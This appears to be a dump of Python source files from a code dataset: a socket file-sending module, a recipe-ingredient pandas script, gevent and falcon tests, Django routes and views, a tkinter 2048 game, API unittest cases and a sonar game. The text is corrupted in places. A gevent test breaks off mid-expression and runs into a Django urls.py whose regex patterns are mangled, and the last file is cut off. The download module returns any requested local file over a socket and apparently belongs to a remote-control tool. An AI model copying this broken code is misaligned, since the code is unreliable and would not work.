host,port):\n\tarquivo = filename.decode(\"utf-8\")\n\tif os.path.isfile(filename):\n\t\ts.send(str.encode(\"EXISTS\" + str((os.path.getsize(filename)))))\n\t\ttamanho = os.path.getsize(filename)\n\t\ttamanho = int(tamanho)\n\t\tuserResponse = s.recv(1024)\n\t\tif userResponse[:2].decode(\"utf-8\") == 'OK':\n\t\t\twith open(arquivo, 'rb') as f:\n\t\t\t\tbytesToSend = f.read()\n\t\t\t\ts.send(bytesToSend)\n\t\t\t\tf.close()\n\telse:\n\t\ts.send(str.encode(\"ERROR\"))\n\n","sub_path":"linux/modules/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"327613630","text":"import pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy import MetaData, event\n\nconn = sqlalchemy.create_engine('mysql+pymysql://root@localhost/alchemy?charset=utf8')\n\nmeta = MetaData()\nmeta.reflect(bind=conn)\n\nAllIngredients = meta.tables['all_ingredients']\n\nimport numpy as np\n\ndef add_own_encoders(conn, cursor, query, *args):\n cursor.connection.encoders[np.int64] = lambda value, encoders: int(value)\n cursor.connection.encoders[np.float64] = lambda value, encoders: float(value)\n cursor.connection.encoders[pd.Timestamp] = lambda value, encoders: encoders[str](str(value.to_pydatetime()))\n cursor.connection.encoders[pd.Timedelta] = lambda value, encoders: value.total_seconds()\n\nevent.listen(conn, \"before_cursor_execute\", add_own_encoders)\n\n\npd.set_option('display.max_rows', 50)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 2000)\n\ndf_receipts = pd.read_sql(\"SELECT * FROM receipts;\", conn, index_col='id')\ndf_ingredients = pd.read_sql(\"SELECT * FROM ingredients;\", conn)\n\ndf_ingredients = pd.concat([pd.read_pickle('receipt/df_ingredients_part_{}.pkl'.format(i)) for i in [0,1,2]])\ndf_receipts = pd.concat([pd.read_pickle('receipt/df_receipts_part_{}.pkl'.format(i)) for i in [0,1,2,3,4,5]])\n\n# for i, part in enumerate(np.array_split(df_receipts, 6)):\n# part.to_pickle('receipt/df_receipts_part_{}.pkl'.format(i))\n# for i, part in enumerate(np.array_split(df_ingredients, 3)):\n# part.to_pickle('receipt/df_ingredients_part_{}.pkl'.format(i))\n\ndf = df_ingredients.join(df_receipts, on='receipt_id', lsuffix='_ing').set_index('id')\ndf.type.unique()\n# df[df.type == 'ivona'].name_ing.unique()\n#\n# df[df.type == 'ivona'].groupby('name_ing').name_ing.count().sort_values()\n#\n# others = df[df.type != 'ivona'].name_ing.apply(lambda x: x.split(' – ')[0]).apply(lambda x: x.split('—')[0])\ndf.loc[df.type != 'ivona', 'name_ing'] = df[df.type != 'ivona'].name_ing.apply(lambda x: x.split(' – ')[0]).apply(lambda x: x.split('—')[0])\n\ndf.name_ing = df.name_ing.apply(lambda x: x.lower())\n\nuniq_ings = df.groupby('name_ing').name_ing.count().sort_values()\n\n\n#uniq_ings['df_id'] = uniq_ings[:10].name.apply(lambda name: df[df.name_ing == name].index.value)\n# uniq_ings['df_id'] = uniq_ings.name.apply(lambda name: df[df.name_ing == name].index.values[0])\ndf['ing_id'] = df.name_ing.apply(lambda name: uniq_ings[uniq_ings.name == name].index.values[0])\n\n# for i, part in enumerate(np.array_split(df, 6)):\n# part.to_pickle('receipt/df_part_{}.pkl'.format(i))\n#\n# uniq_ings.to_pickle('receipt/df_uniq_ings.pkl')\n\nuniq_ings = uniq_ings.to_frame('count').reset_index().rename(columns={'name_ing':'name'})\nuniq_ings.index.name = 'id'\n\n# df = df[:10000]\n#\n# i = 0\n# def trr(x):\n# global i\n# v = uniq_ings[uniq_ings.name == x].index\n# print(i, x, v)\n# i += 1\n# return v\n#\n# df['ing_index'] = df.name_ing.apply(trr)\n\n\n\n\n\n\n# uu = df.join(uniq_ings, on='name')\n\nuniq_ings['ing'] = ''\nuniq_ings.loc[uniq_ings.name.str.contains(\"лук\"), 'ing'] = 'лук'\nuniq_ings.loc[uniq_ings.name.str.contains(\"яйц\"), 'ing'] = 'яйцо'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"кунжут\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'кунжутное масло'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"оливков\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'оливковое масло'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"растит\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'растительное масло'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"сливоч\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'сливочное масло'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"подсолн\")) & (uniq_ings.name.str.contains(\"масл\")), 'ing'] = 'подсолнечное масло'\nuniq_ings.loc[uniq_ings.name.str.contains(\"молок\"), 'ing'] = 'молоко'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"сгущен\")) & (uniq_ings.name.str.contains(\"молок\")), 'ing'] = 'cгущённое молоко'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"сгущён\")) & (uniq_ings.name.str.contains(\"молок\")), 'ing'] = 'cгущённое молоко'\nuniq_ings.loc[uniq_ings.name.str.contains(\"сметан\"), 'ing'] = 'сметана'\nuniq_ings.loc[uniq_ings.name.str.contains(\"сахар\"), 'ing'] = 'сахар'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"ваниль\")) & (uniq_ings.name.str.contains(\"сахар\")), 'ing'] = 'ванильный сахар'\nuniq_ings.loc[uniq_ings.name.str.contains(\"картоф\"), 'ing'] = 'картофель'\nuniq_ings.loc[uniq_ings.name.str.contains(\"морковь\"), 'ing'] = 'морковь'\nuniq_ings.loc[uniq_ings.name.str.contains(\"мука\"), 'ing'] = 'мука'\nuniq_ings.loc[uniq_ings.name.str.contains(\"лимон\"), 'ing'] = 'лимон'\nuniq_ings.loc[(uniq_ings.name.str.contains(\"сок\")) & (uniq_ings.name.str.contains(\"лимон\")), 'ing'] = 'лимонный сок'\n\nuniq_ings[uniq_ings.name.str.contains(\"рис\")]\n# uniq_ings[uniq_ings.name.str.contains(\"майонез\")]\n\nuniq_ings.to_sql('unique_ingredients', con=conn, if_exists='append')\n","sub_path":"receipt/lab_prepare_all_ingridients.py","file_name":"lab_prepare_all_ingridients.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"319954112","text":"# Copyright (c) 2009 AG Projects\n# Author: Denis Bilenko\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport greentest\nimport time\nimport re\nimport gevent\nfrom gevent import socket\nfrom gevent.hub import Waiter, get_hub\n\nDELAY = 0.1\n\n\nclass TestCloseSocketWhilePolling(greentest.TestCase):\n\n def test(self):\n try:\n sock = socket.socket()\n get_hub().loop.timer(0, sock.close)\n sock.connect(('python.org', 81))\n except Exception:\n gevent.sleep(0)\n else:\n assert False, 'expected an error here'\n\n\nclass TestExceptionInMainloop(greentest.TestCase):\n\n def test_sleep(self):\n # even if there was an error in the mainloop, the hub should continue to work\n start = time.time()\n gevent.sleep(DELAY)\n delay = time.time() - start\n\n assert delay >= DELAY * 0.9, 'sleep returned after %s seconds (was scheduled for %s)' % (delay, DELAY)\n\n error = greentest.ExpectedException('TestExceptionInMainloop.test_sleep/fail')\n\n def fail():\n raise error\n\n t = get_hub().loop.timer(0.001)\n t.start(fail)\n\n self.expect_one_error()\n\n start = time.time()\n gevent.sleep(DELAY)\n delay = time.time() - start\n\n self.assert_error(value=error)\n\n assert delay >= DELAY * 0.9, 'sleep returned after %s seconds (was scheduled for %s)' % (delay, DELAY)\n\n\nclass TestSleep(greentest.GenericWaitTestCase):\n\n def wait(self, timeout):\n gevent.sleep(timeout)\n\n def test_simple(self):\n gevent.sleep(0)\n\n\nclass TestWaiterGet(greentest.GenericWaitTestCase):\n\n def setUp(self):\n super(TestWaiterGet, self).setUp()\n self.waiter = Waiter()\n\n def wait(self, timeout):\n evt = get_hub().loop.timer(timeout)\n evt.start(self.waiter.switch)\n try:\n return self.waiter.get()\n finally:\n evt.stop()\n\n\nclass TestWaiter(greentest.TestCase):\n\n def test(self):\n waiter = Waiter()\n self.assertEqual(str(waiter), '')\n waiter.switch(25)\n self.assertEqual(str(waiter), '')\n self.assertEqual(waiter.get(), 25)\n\n waiter = Waiter()\n waiter.throw(ZeroDivisionError)\n assert re.match('^\\d+)/$\", ForumView.as_view(), name= \"forum\"),\n url(r\"^topic/(?P\\d+)/$\", TopicView.as_view(), name= \"topic\"),\n url(r\"^new_topic/(?P\\d+)/$\" , LR(NewTopic.as_view()), name= \"new_topic\"),\n url(r\"^reply/(?P\\d+)/$\" , LR(Reply.as_view()), name=\"reply\"),\n url(r\"^profile/(?P\\d+)/$\" , LR(EditProfile.as_view()), name=\"profile\"),\n url(r\"^viewprofile/(?P\\d+)/$\" , LR(UserPageView.as_view()), name=\"viewprofile\"),\n url(r\"^new_wallpost/(?P\\d+)/$\" , LR(NewWallpost.as_view()), name= \"new_wallpost\"),\n url(r\"^(?P\\d+)/like/$\", LR(like), name='like'),\n url(r\"^(?P\\d+)/friendlist/$\", LR(friendsList), name=\"friendlist\"),\n url(r\"^(?P\\d+)/addfriend/$\", LR(friendAdd),name=\"addfriend\"),\n url(r\"^(?P\\d+)/removefriend/$\", LR(friendRemove),name=\"removefriend\"),\n url(r\"^$\", Main.as_view(), name=\"main\"),\n)\n","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"527507012","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\n基于python和tkinter做的一个2048小游戏\n\"\"\"\n\nimport random\nimport numpy as np\nfrom tkinter import Frame, Label, CENTER\nimport datetime\n\nWIDTH = 400\nHEIGHT = 400\nLABEL_WIDTH = 5\nLABEL_HEIGHT = 2\nBACKGROUND_COLOR_GAME = \"#92877d\"\nBACKGROUND_COLOR_CELL_EMPTY = \"#9e948a\"\n\nGRID_LEN = 4\nGRID_PADDING = 10\n\nBACKGROUND_COLOR_DICT = {\n 2: \"#eee4da\", 4: \"#ede0c8\", 8: \"#f2b179\", 16: \"#f59563\",\n 32: \"#f67c5f\", 64: \"#f65e3b\", 128: \"#edcf72\", 256: \"#edcc61\",\n 512: \"#edc850\", 1024: \"#edc53f\", 2048: \"#edc22e\", 4096: \"#eee4da\",\n 8192: \"#edc22e\", 16384: \"#f2b179\", 32768: \"#f59563\", 65536: \"#f67c5f\"\n}\n\nCELL_COLOR_DICT = {\n 2: \"#776e65\", 4: \"#776e65\", 8: \"#f9f6f2\", 16: \"#f9f6f2\",\n 32: \"#f9f6f2\", 64: \"#f9f6f2\", 128: \"#f9f6f2\", 256: \"#f9f6f2\",\n 512: \"#f9f6f2\", 1024: \"#f9f6f2\", 2048: \"#f9f6f2\", 4096: \"#776e65\",\n 8192: \"#f9f6f2\", 16384: \"776e65\", 32768: \"#776e65\", 65536: \"#f9f6f2\"\n}\n\nFONT = (\"Verdana\", 40, \"bold\")\n\nKEY_UP_ALT = \"\\'\\\\uf700\\'\"\nKEY_DOWN_ALT = \"\\'\\\\uf701\\'\"\nKEY_LEFT_ALT = \"\\'\\\\uf702\\'\"\nKEY_RIGHT_ALT = \"\\'\\\\uf703\\'\"\n\nKEY_UP = \"'w'\"\nKEY_DOWN = \"'s'\"\nKEY_LEFT = \"'a'\"\nKEY_RIGHT = \"'d'\"\nKEY_BACK = \"'b'\"\n\n\ndef show_time():\n \"\"\"显示当前时间\"\"\"\n return datetime.datetime.now().isoformat()\n\n\ndef new_game(n):\n \"\"\"创建一个新的游戏\"\"\"\n print(\"[INFO]{}:Begin to create a new game.\".format(show_time()))\n matrix = []\n for i in range(n):\n matrix.append([0] * n)\n print(\"[INFO]{}:Create the game mat complete, the mat:{}\".format(show_time(), matrix))\n return matrix\n\n\ndef add_two(mat):\n \"\"\"在一个空的格子里产生一个2\"\"\"\n print(\"[INFO]{}:To generate a new 2 in empty cell.\".format(show_time()))\n a = random.randint(0, len(mat) - 1)\n b = random.randint(0, len(mat) - 1)\n while (mat[a][b] != 0):\n a = random.randint(0, len(mat) - 1)\n b = random.randint(0, len(mat) - 1)\n mat[a][b] = 2\n print(\"[INFO]{}:Generate 2 complete, the mat:{}\".format(show_time(), mat))\n return mat\n\n\ndef game_state(mat):\n \"\"\"当前游戏的状态\"\"\"\n print(\"[INFO]{}:To show the state of the game.\".format(show_time()))\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 2048:\n return \"Win\"\n for i in range(len(mat) - 1):\n for j in range(len(mat[0]) - 1):\n if mat[i][j] == mat[i + 1][j] or mat[i][j + 1] == mat[i][j]:\n return \"Not over\"\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 0:\n return \"Not over\"\n for k in range(len(mat) - 1):\n if mat[len(mat) - 1][k] == mat[len(mat) - 1][k + 1]:\n return \"Not over\"\n for j in range(len(mat) - 1):\n if mat[j][len(mat) - 1] == mat[j + 1][len(mat) - 1]:\n return \"Not over\"\n return \"Lose\"\n\n\ndef reverse(mat):\n \"\"\"将整个矩阵反转,[[1, 2], [3, 4]]--->[[2, 1], [4, 3]]\"\"\"\n print(\"[INFO]{}:To reverse the mat vertically.\".format(show_time()))\n tmp = np.array([[0, 0, 0, 1], [0, 0, 1, 0], [0, 1, 0, 0], [1, 0, 0, 0]])\n new = np.dot(mat, tmp).tolist()\n print(\"[INFO]{}:Reverse the mat complete.\".format(show_time()))\n return new\n\n\ndef transpose(mat):\n \"\"\"将整个矩阵转置,[[1, 2], [3, 4]]--->[[1, 3], [2, 4]]\"\"\"\n print(\"[INFO]{}:To reverse the mat horizontally.\".format(show_time()))\n new = np.array(mat).T.tolist() # 使用numpy将列表转换为矩阵求转置再转换为列表\n print(\"[INFO]{}:Transpose the mat complete.\".format(show_time()))\n return new\n\n\ndef cover_up(mat):\n \"\"\"朝左侧覆盖空格\"\"\"\n print(\"[INFO]{}:To cover up the frame.\".format(show_time()))\n new = [[0, 0, 0, 0] for i in range(4)]\n done = False\n for i in range(4):\n count = 0\n for j in range(4):\n if mat[i][j] != 0:\n new[i][count] = mat[i][j]\n if j != count:\n done = True\n count += 1\n print(\"[INFO]{}:Cover up the frame complete.\".format(show_time()))\n return (new, done)\n\n\ndef merge(mat):\n \"\"\"合并可翻倍的网格\"\"\"\n print(\"[INFO]{}:Begin to merge.\".format(show_time()))\n done = False\n for i in range(4):\n for j in range(3):\n if mat[i][j] == mat[i][j + 1] and mat[i][j] != 0:\n mat[i][j] *= 2\n mat[i][j + 1] = 0\n done = True\n print(\"[INFO]{}:Merge complete.\".format(show_time()))\n return (mat, done)\n\n\ndef up(game):\n print(\"[INFO]{}:Up pressed\".format(show_time()))\n game = transpose(game)\n game, done = cover_up(game)\n temp = merge(game)\n game = temp[0]\n done = done or temp[1]\n game = cover_up(game)[0]\n game = transpose(game)\n return (game, done)\n\n\ndef down(game):\n print(\"[INFO]{}:Down pressed\".format(show_time()))\n game = reverse(transpose(game))\n game, done = cover_up(game)\n temp = merge(game)\n game = temp[0]\n done = done or temp[1]\n game = cover_up(game)[0]\n game = transpose(reverse(game))\n return (game, done)\n\n\ndef left(game):\n print(\"[INFO]{}:Left pressed\".format(show_time()))\n game, done = cover_up(game)\n temp = merge(game)\n game = temp[0]\n done = done or temp[1]\n game = cover_up(game)[0]\n return (game, done)\n\n\ndef right(game):\n print(\"[INFO]{}:Right pressed\".format(show_time()))\n game = reverse(game)\n game, done = cover_up(game)\n temp = merge(game)\n game = temp[0]\n done = done or temp[1]\n game = cover_up(game)[0]\n game = reverse(game)\n return (game, done)\n\n\nclass GameGrid(Frame):\n \"\"\"游戏界面类\"\"\"\n\n def __init__(self):\n \"\"\"游戏界面初始化\"\"\"\n print(\"[INFO]{}:Initialize the frame.\".format(show_time()))\n Frame.__init__(self)\n\n self.grid()\n self.master.title(\"2048\")\n self.master.bind(\"\", self.key_down)\n\n self.commands = {\n KEY_UP: up,\n KEY_DOWN: down,\n KEY_LEFT: left,\n KEY_RIGHT: right,\n KEY_UP_ALT: up,\n KEY_DOWN_ALT: down,\n KEY_LEFT_ALT: left,\n KEY_RIGHT_ALT: right\n }\n self.grid_cells = []\n self.init_grid()\n self.init_matrix()\n self.update_grid_cells()\n self.mainloop()\n\n def init_grid(self):\n \"\"\"初始化网格\"\"\"\n print(\"[INFO]{}:Initialize the grid.\".format(show_time()))\n background = Frame(self, bg=BACKGROUND_COLOR_GAME, width=WIDTH, height=HEIGHT)\n background.grid()\n\n for i in range(GRID_LEN):\n grid_row = []\n for j in range(GRID_LEN):\n cell = Frame(background, bg=BACKGROUND_COLOR_CELL_EMPTY, width=WIDTH / GRID_LEN,\n height=HEIGHT / GRID_LEN)\n cell.grid(row=i, column=j, padx=GRID_PADDING, pady=GRID_PADDING)\n t = Label(master=cell, text=\"\", bg=BACKGROUND_COLOR_CELL_EMPTY, justify=CENTER, font=FONT,\n width=LABEL_WIDTH, height=LABEL_HEIGHT)\n t.grid()\n grid_row.append(t)\n\n self.grid_cells.append(grid_row)\n print(\"[INFO]{}:Initialize the grid complete.\".format(show_time()))\n\n def gen(self):\n \"\"\"随机生成数字\"\"\"\n return random.randint(0, GRID_LEN - 1)\n\n def init_matrix(self):\n \"\"\"初始化矩阵\"\"\"\n print(\"[INFO]{}:Initialize the matrix\".format(show_time()))\n self.matrix = new_game(4)\n self.history_matrix = list()\n self.matrix = add_two(self.matrix)\n self.matrix = add_two(self.matrix)\n print(\"[INFO]{}:Initialize the mattrix complete.\".format(show_time()))\n\n def update_grid_cells(self):\n \"\"\"更新网格\"\"\"\n print(\"[INFO]{}:Update the grid cells\".format(show_time()))\n for i in range(GRID_LEN):\n for j in range(GRID_LEN):\n new_number = self.matrix[i][j]\n if new_number == 0:\n self.grid_cells[i][j].configure(text=\"\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n else:\n self.grid_cells[i][j].configure(text=str(new_number), bg=BACKGROUND_COLOR_DICT[new_number],\n fg=CELL_COLOR_DICT[new_number])\n self.update_idletasks()\n print(\"[INFO]{}:Update the gride cells complete.\".format(show_time()))\n\n def key_down(self, event):\n \"\"\"按下键盘\"\"\"\n print(\"[INFO]{}:Key pressed\".format(show_time()))\n key = repr(event.char)\n if key == KEY_BACK and len(self.history_matrix) > 1:\n self.matrix = self.history_matrix.pop()\n self.update_grid_cells()\n print(\"[INFO]{}:Back on step totall step:{}\".format(show_time(), len(self.history_matrix)))\n elif key in self.commands:\n self.matrix, done = self.commands[repr(event.char)](self.matrix)\n if done:\n self.matrix = add_two(self.matrix)\n self.history_matrix.append(self.matrix)\n self.update_grid_cells()\n done = False\n if game_state(self.matrix) == \"Win\":\n self.grid_cells[1][1].configure(text=\"You\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n self.grid_cells[1][2].configure(text=\"Win\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n if game_state(self.matrix) == \"Lose\":\n self.grid_cells[1][1].congigure(text=\"You\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n self.grid_cells[1][2].configure(text=\"Lose\", bg=BACKGROUND_COLOR_CELL_EMPTY)\n\n def generate_text(self):\n \"\"\"生成文本\"\"\"\n index = (self.gen(), self.gen())\n while self.matrix[index[0]][index[1]] != 0:\n index = (self.gen(), self.gen())\n self.matrix[index[0]][index[1]] = 2\n\n\ngame_grid = GameGrid()\n","sub_path":"projects/games/2048_python/2048_game.py","file_name":"2048_game.py","file_ext":"py","file_size_in_byte":9895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"361104383","text":"# -*- coding: UTF-8 -*-\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\n\nfrom DeBar.classes import Text\n\nfrom DeBar.models import Mesa\n\n@permission_required(\"DeBar.mesas\", '/sistema/'+Text().permissao_ver_negada(\"Mesas\"))\ndef principal(request):\n\n return renderizar(request, 'cadastro/mesa.html', Variavel({'mesas': getAll(request, Mesa)}))\n\n############################################################################################################\n############################################################################################################\n\n@permission_required(\"DeBar.mesas\", '/sistema/'+Text().permissao_criar_negada(\"Mesas\"))\ndef salvar(request):\n\n#########################################################################################################\n# pega os valores da tela, monta o objeto e depois valida o erro para ver que #\n# tipo de aviso deve mostrar na tela para o usuário #\n#########################################################################################################\n\n inicial = request.POST.get('numeroinicial')\n final = request.POST.get('numerofinal')\n\n mesas = C_Mesa(request, Mesa(), inicial, final)\n\n if mesas.isvalido:\n mesas.save()\n\n if \"Os seguintes\" in mesas.mensagem:\n message.alerta(request, mesas.mensagem)\n elif \"Todo o intervalo\" in mesas.mensagem:\n message.mensagem(request, mesas.mensagem)\n elif \"Por favor, informe um\" in mesas.mensagem:\n message.erro(request, mesas.mensagem)\n else:\n message.erro(request, mesas.mensagem)\n\n\n return HttpResponseRedirect(reverse('MESA_PRINCIPAL'))\n\n############################################################################################################\n############################################################################################################\n\n@permission_required(\"DeBar.mesas\", '/sistema/'+Text().permissao_editar_negada(\"Mesas\"))\ndef ativar(request, id):\n\n#########################################################################################################\n# instancia a classe com o id informado e muda o status #\n#########################################################################################################\n\n mes = getOne(request, Mesa, id)\n mesa = C_Mesa(request, mes)\n\n mesa.ativar()\n\n if mesa.isvalido:\n mesa.save()\n else:\n message.erro(request, mesa.mensagem)\n\n return HttpResponseRedirect(reverse('MESA_PRINCIPAL'))","sub_path":"DeBar/views/mesa.py","file_name":"mesa.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390028908","text":"import unittest\nfrom utils.send_method import SendMethod\nfrom utils.utils import dumpJ\n\n\"\"\"\n 对每个接口进行功能测试\n 使用到的库 unittest\n\"\"\"\n\n\nclass DepartmentTest(unittest.TestCase):\n def setUp(self):\n self.url = \"http://127.0.0.1:8000/api/departments/\"\n self.send = SendMethod()\n\n def test_case_01(self):\n \"\"\"\n 完成查询所有��院接口的测试\n \"\"\"\n res = self.send.send_main(\"get\", url=self.url)\n count = res[\"count\"]\n self.assertNotEqual(count, 0, \"查询所有学院失败\")\n\n def test_case_02(self):\n \"\"\"\n 查询单独指定的一个学院\n \"\"\"\n # 定义参数\n data = {\n \"$dep_id_list\": \"T001\"\n }\n # 发送请求\n res = self.send.send_main(\"get\", url=self.url, data=data)\n # dumpJ(res)\n # 通过count进行断言\n count = res['count']\n self.assertEqual(count, 1, \"查询单个学院接口失败\")\n\n # 通过dep_id进行断言\n dep_id = res['results'][0]['dep_id']\n self.assertEqual(dep_id, \"T001\", \"查询单个学院失败\")\n\n def test_case_03(self):\n \"\"\"\n 更新院长的名字查询单个\n \"\"\"\n # 参数\n data = {\n \"$master_name_list\": \"老张\"\n }\n # 发送请求\n res = self.send.send_main(\"get\", url=self.url, data=data)\n\n # 通过count 断言\n count = res['count']\n self.assertEqual(count, 1, \"根据院长名字查询失败\")\n\n # 根据院长名字断言\n master_name = res['results'][0]['master_name']\n self.assertEqual(master_name, \"老张\", \"根据院长名字查询失败\")\n\n def test_case_04(self):\n \"\"\"\n 测试学院新增接口\n \"\"\"\n # 参数\n data = {\n \"data\": [\n {\n \"dep_id\": \"T01\",\n \"dep_name\": \"测试大学院\",\n \"master_name\": \"段教授\",\n \"slogan\": \"学以致用\"\n }\n ]\n }\n # 发送请求\n res = self.send.send_main(\"post\", url=self.url, json=data)\n # dumpJ(res)\n # 通过create_success中的count断言\n count = res['create_success']['count']\n self.assertEqual(count, 1, \"添加学院失败\")\n\n # 通过create_success中的dep_id断言\n dep_id = res['create_success']['results'][0]['dep_id']\n self.assertEqual(dep_id, \"T01\", \"添加学院失败\")\n\n def test_case_05(self):\n \"\"\"\n 测试学院更新接口\n \"\"\"\n # 准备url\n dep_id = \"T01\"\n url = self.url + \"{}/\".format(dep_id)\n\n # 请求数据\n dep_name = \"测试大学院好\"\n data = {\n \"data\": [\n {\n \"dep_id\": dep_id,\n \"dep_name\": dep_name,\n \"master_name\": \"段教授\",\n \"slogan\": \"学以致用\"\n }\n ]\n }\n\n # 发送请求\n res = self.send.send_main(\"put\", url=url, json=data)\n # dumpJ(res)\n\n # 通过dep_id断言\n self.assertEqual(res['dep_id'], dep_id, \"更新失败\")\n # 通过dep_name断言\n self.assertEqual(res['dep_name'], dep_name, \"更新失败\")\n\n def test_case_06(self):\n \"\"\"\n 删除接口测试\n \"\"\"\n # 参数\n data = {\n \"$dep_id_list\": \"T01\"\n }\n # 发送请求\n res = self.send.send_main(\"delete\", url=self.url, data=data)\n # 通过状态码 204 断言\n self.assertEqual(res, 204, \"删除失败\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_suite/test_department.py","file_name":"test_department.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"612872325","text":"# Sonar Treasure Hunt\n\nimport random\nimport sys\nimport math\n\ndef getNewBoard():\n # Create a new 60x15 board data structure.\n board = []\n for x in range(60): # The main list is a list of 60 lists.\n board.append([])\n for y in range(15): # Each list in the main list has 15 single-character strings.\n # Use different characters for the ocean to make it more readable.\n if random.randint(0, 1) == 0:\n board[x].append('~')\n else:\n board[x].append('`')\n return board\n\ndef drawBoard(board):\n # Draw the board data structure.\n tensDigitsLine = ' ' # Initial space for the numbers down the left side of the board\n for i in range(1, 6):\n tensDigitsLine += (' ' * 9) + str(i)\n\n # Print the numbers across the top of the board.\n print(tensDigitsLine)\n print(' ' + ('0123456789' * 6))\n print()\n\n # Print each of the 15 rows.\n for row in range(15):\n # Single-digit numbers need to be padded with an extra space.\n if row < 10:\n extraSpace = ' '\n else:\n extraSpace = ''\n\n # Create the string for this row on the board.\n boardRow = ''\n for column in range(60):\n boardRow += board[column][row]\n\n print('%s%s %s %s' % (extraSpace, row, boardRow, row))\n\n # Print the numbers across the bottom of the board.\n print()\n print(' ' + ('0123456789' * 6))\n print(tensDigitsLine)\n\n\n#while True:\n # Game setup\n #sonarDevices = 20\ntheBoard = getNewBoard()\n #theChests = getRandomChests(3)\ndrawBoard(theBoard)\n #previousMoves = []\n","sub_path":"sonar.py","file_name":"sonar.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288345466","text":"import io\n\nimport falcon\nfrom falcon import request_helpers\nimport falcon.testing as testing\n\nSIZE_1_KB = 1024\n\n\nclass TestRequestBody(testing.TestBase):\n\n def before(self):\n self.resource = testing.TestResource()\n self.api.add_route('/', self.resource)\n\n def test_empty_body(self):\n self.simulate_request('/', body='')\n stream = self.resource.req.stream\n\n stream.seek(0, 2)\n self.assertEqual(stream.tell(), 0)\n\n def test_tiny_body(self):\n expected_body = '.'\n self.simulate_request('', body=expected_body)\n stream = self.resource.req.stream\n\n actual_body = stream.read(1)\n self.assertEqual(actual_body, expected_body.encode('utf-8'))\n\n stream.seek(0, 2)\n self.assertEqual(stream.tell(), 1)\n\n def test_tiny_body_overflow(self):\n expected_body = '.'\n self.simulate_request('', body=expected_body)\n stream = self.resource.req.stream\n\n # Read too many bytes; shouldn't block\n actual_body = stream.read(len(expected_body) + 1)\n self.assertEqual(actual_body, expected_body.encode('utf-8'))\n\n def test_read_body(self):\n expected_body = testing.rand_string(SIZE_1_KB / 2, SIZE_1_KB)\n expected_len = len(expected_body)\n headers = {'Content-Length': str(expected_len)}\n\n self.simulate_request('', body=expected_body, headers=headers)\n\n content_len = self.resource.req.get_header('content-length')\n self.assertEqual(content_len, str(expected_len))\n\n stream = self.resource.req.stream\n\n actual_body = stream.read()\n self.assertEqual(actual_body, expected_body.encode('utf-8'))\n\n stream.seek(0, 2)\n self.assertEqual(stream.tell(), expected_len)\n\n self.assertEqual(stream.tell(), expected_len)\n\n def test_bounded_stream_property_empty_body(self):\n \"\"\"Test that we can get a bounded stream outside of wsgiref.\"\"\"\n\n environ = testing.create_environ()\n req = falcon.Request(environ)\n\n bounded_stream = req.bounded_stream\n\n # NOTE(kgriffs): Verify that we aren't creating a new object\n # each time the property is called. Also ensures branch\n # coverage of the property implementation.\n assert bounded_stream is req.bounded_stream\n\n data = bounded_stream.read()\n self.assertEqual(len(data), 0)\n\n def test_body_stream_wrapper(self):\n data = testing.rand_string(SIZE_1_KB / 2, SIZE_1_KB)\n expected_body = data.encode('utf-8')\n 